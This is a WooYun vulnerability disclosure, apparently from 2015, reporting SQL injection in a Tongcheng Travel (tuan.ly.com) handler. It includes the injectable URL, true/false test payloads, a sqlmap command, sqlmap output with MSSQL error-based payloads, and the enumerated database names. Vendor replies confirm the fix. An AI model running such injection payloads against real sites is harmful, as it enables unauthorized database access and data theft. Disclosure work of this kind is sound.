当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094663

漏洞标题:同程旅游网主站某处SQL注入

相关厂商:苏州同程旅游网络科技有限公司

漏洞作者: xhc39

提交时间:2015-01-29 23:18

修复时间:2015-01-30 13:21

公开时间:2015-01-30 13:21

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-29: 细节已通知厂商并且等待厂商处理中
2015-01-29: 厂商已经确认,细节仅向厂商公开
2015-01-30: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

同程旅游网主站SQL注入

详细说明:

http://tuan.ly.com/tuan/Handler/TuanDetailAjaxHandler.ashx?method=GetUserGrade&groupbuyid=654708&iid=0.7009963680917772 中groupbuyid参数存在SQL注入,可跑出整个数据库
真假判断
http://tuan.ly.com/tuan/Handler/TuanDetailAjaxHandler.ashx?method=GetUserGrade&groupbuyid=654708)+and+3983=3983+and+(5483=5483&iid=0.7009965680917772

漏洞证明:

root@kali:~# sqlmap -u "http://tuan.ly.com/tuan/Handler/TuanDetailAjaxHandler.ashx?method=GetUserGrade&groupbuyid=654708&iid=0.7009963680917772" -p groupbuyid --dbs --time-sec=20
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:55:49
[21:55:52] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: groupbuyid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: method=GetUserGrade&groupbuyid=654708) AND 3983=3983 AND (5483=5483&iid=0.7009963680917772
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: method=GetUserGrade&groupbuyid=654708) AND 9886=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (9886=9886) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(100)+CHAR(120)+CHAR(112)+CHAR(113))) AND (8039=8039&iid=0.7009963680917772
---
[21:55:54] [INFO] testing Microsoft SQL Server
[21:55:55] [INFO] confirming Microsoft SQL Server
[21:55:56] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[21:55:56] [INFO] fetching database names
sqlmap got a 302 redirect to 'http://tuan.ly.com:80/404.htm'. Do you want to follow? [Y/n] n
[21:56:00] [WARNING] the SQL query provided does not return any output
[21:56:00] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[21:56:00] [INFO] fetching number of databases
[21:56:00] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[21:56:00] [INFO] retrieved: 
[21:56:00] [ERROR] unable to retrieve the number of databases
[21:56:01] [INFO] retrieved: TCHotel
[21:56:01] [INFO] retrieved: master
available databases [2]:
[*] master
[*] TCHotel
[22:01:34] [INFO] fetching tables for database: TCHotel
[22:01:35] [INFO] the SQL query used returns 106 entries
[22:01:36] [INFO] retrieved: dbo.Business********
[22:01:37] [INFO] retrieved: dbo.ctrip*****
[22:01:37] [INFO] retrieved: dbo.eBooking******
[22:01:38] [INFO] retrieved: dbo.**************
[22:01:39] [INFO] retrieved: dbo.**************
[22:01:40] [INFO] retrieved: dbo.**************
[22:01:41] [INFO] retrieved: dbo.**************
[22:01:42] [INFO] retrieved: dbo.**************
[22:01:43] [INFO] retrieved: dbo.**************
[22:01:44] [INFO] retrieved: dbo.**************
[22:01:45] [INFO] retrieved: dbo.**************

sql1.png

sql2.png

修复方案:

过滤

版权声明:转载请注明来源 xhc39@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-01-29 23:44

厂商回复:

感谢关注同程旅游,这个注入点挺奇怪的,只有一个库?

最新状态:

2015-01-30:半夜麻烦运维兄弟临时迁到还在小范围测试的软WAF上来,一看logstash这个点儿居然还有不少流量。为了最小化影响,就先只迁了有问题的这部分,等明天上班看下具体什么问题。好想直接公开漏洞求bypass waf...

2015-01-30:公开公开

漏洞评价:

评论

  1. 2015-01-29 23:34 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    ....

  2. 2015-01-29 23:40 | 糖剩七颗 ( 普通白帽子 | Rank:430 漏洞数:61 | 天涯何处无屌丝)

    主站。。。

  3. 2015-01-29 23:45 | 苏州同程旅游网络科技有限公司(乌云厂商)

    @糖剩七颗 子域名,不是主站哎

  4. 2015-01-29 23:47 | 糖剩七颗 ( 普通白帽子 | Rank:430 漏洞数:61 | 天涯何处无屌丝)

    @苏州同程旅游网络科技有限公司 目测是主站的某个模块,但是操作是跳去子域名的吧

  5. 2015-01-30 00:35 | 苏州同程旅游网络科技有限公司(乌云厂商)

    @糖剩七颗 貌似是APP调用的接口,还在紧急处理中。

  6. 2015-01-30 00:46 | 苏州同程旅游网络科技有限公司(乌云厂商)

    @糖剩七颗 好吧,看了下这个子站的页面请求。不是APP接口,只是响应长的有点像。

  7. 2015-02-07 19:08 | xhc39 ( 路人 | Rank:30 漏洞数:2 | ...)

    收到厂商送的200京东卡,多谢~

  8. 2015-02-25 22:31 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    给力啊。来膜拜你们了